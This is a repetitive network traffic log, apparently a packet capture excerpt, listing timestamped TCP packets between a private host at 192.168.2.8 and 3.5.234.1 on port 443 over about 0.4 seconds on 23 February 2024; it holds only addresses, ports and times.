Feb 23, 2024 15:34:02.353184938 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.353230000 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.353260040 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.353271008 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.353307009 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.353348017 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.354295969 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.354315042 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.354360104 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.354389906 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.354402065 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.354429960 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.354664087 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.355418921 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.355447054 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.355489016 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.355520010 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.355530977 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.355560064 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.355936050 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.356882095 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.356901884 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.356950998 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.356976032 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.356987953 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.357017040 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.357045889 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.358159065 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.358177900 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.358225107 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.358257055 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.358268976 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.358298063 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.358674049 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.359560966 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.359594107 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.359636068 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.359642982 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.359652996 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.359678984 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.359700918 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.360877991 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.360898972 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.360945940 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.360955954 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.360965014 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.360995054 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.361011028 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.362590075 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.362610102 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.362659931 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.362688065 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.362698078 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.362751007 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.362790108 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.363842010 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.363871098 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.363945007 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.363955975 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.364017010 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.364027023 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.364084959 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.365233898 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.365252972 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.365302086 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.365315914 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.365325928 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.365353107 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.365372896 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.365396976 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.366560936 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.366581917 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.366631985 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.366642952 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.366652966 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.366681099 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.366702080 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.366720915 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.367959976 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.367991924 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.368040085 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.368051052 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.368077993 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.368113995 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.368124008 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.368180990 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.369559050 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.369579077 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.369649887 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.369661093 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.369687080 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.369963884 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.369975090 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.370038986 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.371299982 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.371328115 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.371381044 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.371387959 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.371398926 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.371423960 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.371443033 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.372581959 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.372602940 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.372653961 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.372680902 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.372692108 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.372725964 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.372772932 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.373919964 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.373939991 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.374001026 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.374011993 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.374022007 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.374058962 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.374058962 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.374082088 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.374783039 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.374813080 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.374857903 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.374862909 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.374876022 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.374893904 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.374931097 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.375643969 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.375669003 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.375729084 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.375732899 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.375742912 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.375770092 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.375793934 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.377094030 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.377115011 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.377171993 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.377180099 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.377190113 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.377216101 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.377233028 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.377260923 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.378562927 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.378583908 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.378632069 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.378649950 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.378659964 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.378695011 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.378695011 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.378722906 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.379949093 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.379971981 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.380019903 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.380036116 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.380045891 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.380074024 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.380093098 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.380111933 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.381438971 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.381460905 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.381525993 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.381536007 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.381561995 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.381596088 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.381606102 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.381952047 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.383270979 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.383296967 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.383344889 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.383359909 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.383368969 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.383410931 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.383433104 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.384150982 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.384171009 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.384224892 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.384242058 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.384252071 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.384282112 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.384299040 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.385193110 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.385227919 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.385272026 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.385278940 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.385288000 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.385313988 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.385341883 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.386694908 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.386719942 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.386760950 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.386831999 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.386845112 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.386872053 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.386894941 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.387800932 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.387821913 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.387871027 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.387895107 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.387907028 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.387933969 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.387963057 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.388916969 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.388941050 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.388993979 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.388998032 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.389008999 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.389035940 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.389053106 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.389095068 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.390091896 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.390120029 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.390178919 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.390180111 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.390192032 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.390214920 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.390237093 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.391407967 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.391427040 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.391486883 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.391490936 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.391500950 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.391544104 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.391544104 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.391571045 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.392646074 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.392673969 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.392730951 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.392739058 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.392749071 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.392777920 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.392793894 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.394114971 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.394134998 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.394181013 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.394207001 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.394217014 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.394258976 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.394283056 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.395262003 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.395287991 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.395338058 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.395361900 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.395378113 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.395401955 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.395683050 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.396450996 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.396473885 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.396523952 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.396534920 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.396543980 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.396570921 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.396589041 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.396606922 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.397536039 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.397561073 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.397609949 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.397639036 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.397649050 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.397680044 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.397696018 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.398539066 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.398559093 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.398607969 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.398626089 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.398634911 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.398669004 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.398669004 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.398696899 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.399597883 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.399626970 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.399672031 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.399681091 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.399708986 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.399729967 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.399738073 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.400222063 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.730365038 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.730443001 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.730592012 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.730657101 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.730709076 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.730720997 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.730767012 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.730823040 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.731092930 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.731112957 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.731162071 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.731199026 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.731214046 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.731317997 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.731564999 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.731589079 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.731630087 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.731707096 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.731719017 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.731770992 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.731826067 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.732032061 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.732050896 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.732115030 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.732134104 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.732145071 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.732168913 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.732193947 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.732197046 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.732239008 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.732249975 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.732279062 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.732326031 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.733305931 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.733325005 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.733372927 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.733411074 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.733423948 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.733455896 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.733494997 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.734478951 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.734498978 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.734568119 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.734591961 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.734603882 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.734628916 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.734636068 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.734672070 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.734682083 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.734711885 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.734730959 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.734760046 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.734782934 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.734793901 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.734826088 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.734858990 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.735877037 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.735896111 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.735951900 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.735999107 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.736011982 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.736041069 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.736078978 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.736773014 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.736793041 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.736839056 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:02.736881018 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:02.736896038 CET	443	49705	3.5.234.1	192.168.2.8
